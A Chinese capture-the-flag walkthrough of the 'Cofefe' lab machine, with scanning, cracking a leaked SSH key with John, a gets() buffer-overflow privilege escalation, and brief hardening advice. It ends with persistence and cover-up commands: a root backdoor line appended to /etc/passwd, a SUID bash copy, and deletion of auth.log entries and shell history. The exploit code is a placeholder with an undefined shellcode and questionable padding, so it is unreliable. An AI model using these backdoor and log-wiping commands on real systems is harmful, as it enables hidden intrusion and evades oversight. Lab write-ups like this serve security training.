Cofefe靶场 SSH私钥破解与缓冲区溢出提权:3个Flag获取完整路径解析

发布时间:2026/9/20 22:35:16

Cofefe靶场 SSH私钥破解与缓冲区溢出提权:3个Flag获取完整路径解析 Cofefe靶场渗透实战SSH私钥破解与缓冲区溢出提权深度解析1. 靶场环境搭建与信息收集在开始渗透之前确保你的Kali攻击机和Cofefe靶机处于同一网络环境建议使用NAT模式。首先我们需要进行基础网络配置检查ifconfig eth0 | grep inet addr # Kali查看本机IP nmap -sn 192.168.5.0/24 # 扫描同网段存活主机通过扫描我们发现靶机IP为192.168.5.163。接下来进行全面的端口扫描和服务识别nmap -sS -sV -A -p- 192.168.5.163 -oN nmap_scan.txt扫描结果显示三个开放端口22/tcp : OpenSSH 7.9p180/tcp : nginx 1.14.231337/tcp: Apache httpd 2.4.29关键发现31337端口的web服务存在敏感目录泄露/.bash_history /.bashrc /.profile /.ssh/ /robots.txt2. SSH私钥获取与破解2.1 敏感文件分析访问/.ssh/目录发现三个关键文件id_rsa : SSH私钥加密id_rsa.pub : SSH公钥authorized_keys : 授权密钥文件使用wget下载私钥文件wget http://192.168.5.163:31337/.ssh/id_rsa -O cofefe_id_rsa2.2 私钥密码破解加密的SSH私钥需要先转换为John可识别的hash格式ssh2john cofefe_id_rsa cofefe_hash john --wordlist/usr/share/wordlists/rockyou.txt cofefe_hash破解结果密码为starwars2.3 SSH免密登录修改私钥权限并登录chmod 600 cofefe_id_rsa ssh -i cofefe_id_rsa simon192.168.5.163登录后执行基础信息收集whoami # 当前用户 id # 用户权限 ls -la / # 根目录查看 find / -user simon -type f 2/dev/null # 用户文件检索3. 缓冲区溢出漏洞分析与利用3.1 漏洞代码审计在用户目录发现关键文件read_message.c分析其源码#include stdio.h #include string.h void read_message() { char buf[20]; printf(Enter your name: ); gets(buf); // 危险函数无边界检查 if(strncmp(buf, simon, 5) 0) { printf(Hello %s\n, buf); } } int main() { read_message(); return 0; }漏洞点分析gets()函数未做输入长度限制buf数组仅20字节空间前5字符匹配simon即可通过验证3.2 漏洞利用开发构造payload结构[20字节填充] [返回地址] [shellcode]使用Python生成攻击载荷import struct buf bsimon # 通过验证的前5字节 buf bA*15 # 填充剩余15字节 buf struct.pack(I, 0xdeadbeef) # 覆盖返回地址 buf b\x90*50 shellcode # NOP雪橇shellcode print(buf)3.3 本地编译与测试首先在靶机编译程序gcc read_message.c -o read_message -fno-stack-protector -z execstack然后执行漏洞利用(python -c print simonAAAABBBBCCCC\xef\xbe\xad\xde...shellcode...; cat) | ./read_message成功获取root shell后可读取所有flagcat /root/flag3.txt cat /home/simon/flag1.txt cat /var/www/flag2.txt4. 渗透路径全流程总结完整攻击链如下表所示阶段技术手段关键命令/操作获取权限信息收集Nmap扫描nmap -sS -A -p- 靶机IP无Web目录爆破Dirb扫描dirb http://靶机IP:31337无SSH私钥获取敏感文件泄露下载/.ssh/id_rsa无私钥密码破解John暴力破解ssh2johnjohn无SSH登录私钥认证ssh -i id_rsa simon靶机simon用户本地提权缓冲区溢出构造恶意输入覆盖EIProot权限防御建议避免在web目录存放敏感文件使用ssh-keygen -o -a 100生成强密码保护的密钥替换不安全的gets()函数为fgets()启用ASLR和栈保护编译选项5. 扩展思考与技巧5.1 自动化漏洞利用使用Metasploit框架快速生成漏洞利用模块class MetasploitModule Msf::Exploit::Local def exploit payload simon A*15 [target.ret].pack(V) payload.encoded exec_program /tmp/read_message File.write(exec_program, payload) system(chmod x #{exec_program}) system(#{exec_program}) end end5.2 权限维持技巧获取root后建立持久化后门# 添加root后门账户 echo backdoor:$(openssl passwd -1 password):0:0:root:/root:/bin/bash /etc/passwd # 设置SUID shell cp /bin/bash /tmp/.rootshell chmod 4755 /tmp/.rootshell5.3 日志清理方法清除相关日志痕迹# SSH登录记录 sed -i /simon/d /var/log/auth.log # 命令历史清理 echo ~/.bash_history history -c
延伸阅读

更多相关文章

2026/9/20 22:35:17

AI企业算力成本优化:从模型剪枝到多云部署实战策略

Anthropic 2026年算力支出达薪酬2.3倍:AI企业成本结构深度解析与应对策略在AI技术快速发展的今天,企业面临的最大挑战之一就是如何平衡技术投入与商业回报。最近Anthropic公布的预测数据显示,到2026年,AI工程师的算力支出可能达到…

2026/9/20 8:47:19

《玄空秘旨》山形水势解析:3类‘非正配’格局的现代环境应用启示

《玄空秘旨》空间能量转译:3类非标准格局在现代环境设计中的量化应用 当我们站在上海陆家嘴环形天桥俯瞰建筑群时,那些错落有致的摩天大楼形成的天际线,与黄浦江的蜿蜒曲线构成了奇妙的互动关系。这种现代都市中无意识形成的空间韵律&#xf…

2026/9/20 22:35:20

AI视频生成工具实战:从环境配置到批量生成全流程指南

这类 AI 视频生成工具,最值得先看的不是它能做出多炫酷的效果,而是它能不能在普通电脑上稳定跑起来,以及新手第一次用的时候,到底该从哪里下手。 “巨人假睫毛长啥样?”这个标题,其实点出了一个很实际的问…

2026/9/21 19:49:25

疯狂猜图 帽子进阶用法

面试官拷问疯狂猜图帽子逻辑,手写实现避坑指南 面试被问原理答不上来?别慌。昨天陪一个哥们模拟面试,聊到前端状态管理和组件通信,他卡壳了。面试官顺嘴提了一句:“像《疯狂猜图》里那个帽子切换逻辑,你如果不用…

2026/9/21 19:49:25

参考文献格式生成器避坑:5个致命错误与最佳实践

参考文献格式生成器避坑:5个致命错误与最佳实践 报错一堆看不懂,StackTrace 长得像天书,参考文献格式生成器明明配好了却输出乱码?别慌,这往往是配置细节或依赖版本冲突导致的。作为在一线踩过无数坑的开发者,我见过太多团队因为忽略…

2026/9/21 19:49:25

老太BBW搡BBBB搡BBBB完整示例

3步吃透HTTP协议:保姆级教程带你告别官方文档焦虑 官方文档太长抓不住重点?RFC 2616那几千行英文谁看得完?别慌,这篇 保姆级教程 专治各种“文档焦虑症”。 这里有一个必须澄清的事实:…

2026/9/21 19:44:25

双曲螺线面试避坑指南:拒绝Stack Trace崩溃

双曲螺线面试避坑指南:拒绝Stack Trace崩溃 刚跑完双曲螺线算法,满屏红色报错?StackTrace 长得像天书,完全不知道从哪查起。别慌,这是典型的参数初始化或浮点精度陷阱。这份避坑指南专治各种“算得出来画不出来”的玄学问题,帮你…

2026/9/21 3:28:31

GAMP 5 基于风险的计算机化系统验证:软件分类与审计追踪实践

简介:《A Risk-Based Approach to Compliant GxP Computerized Systems》即业内熟知的GAMP 5指南,面向制药企业质量与IT合规人员、验证工程师及计算机化系统管理者,用于解决GxP法规环境下系统合规性难以科学落地的问题。文档以风险管理为主线…

2026/9/21 3:33:19

安全托管MSSP实战:从静态防御到人机协同的攻防运营与应急响应

简介:这份PPT围绕互联网业务安全托管服务展开,面向企业安全负责人、IT运维人员及关注MSSP/MSS选型的读者,重点回应传统安全过度依赖人工、碎片化静态防御难以对抗产业化攻击等痛点。资源共1个pptx文件,包体约30.63MB,以…

2026/9/21 0:02:23

OpenResearch:构建可复现的开放式研究工作流

第一次看到“OpenResearch”这个名字,我脑子里冒出的不是某个具体软件,而更像一种研究方式的宣言:开放、可复现、可验证。这三件事放在一起,其实比大多数人想象中难得多。过去几年我一直在折腾自己的研究工作流,从纯纸…

2026/9/20 4:54:47

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/21 18:32:12

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/21 10:29:02

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码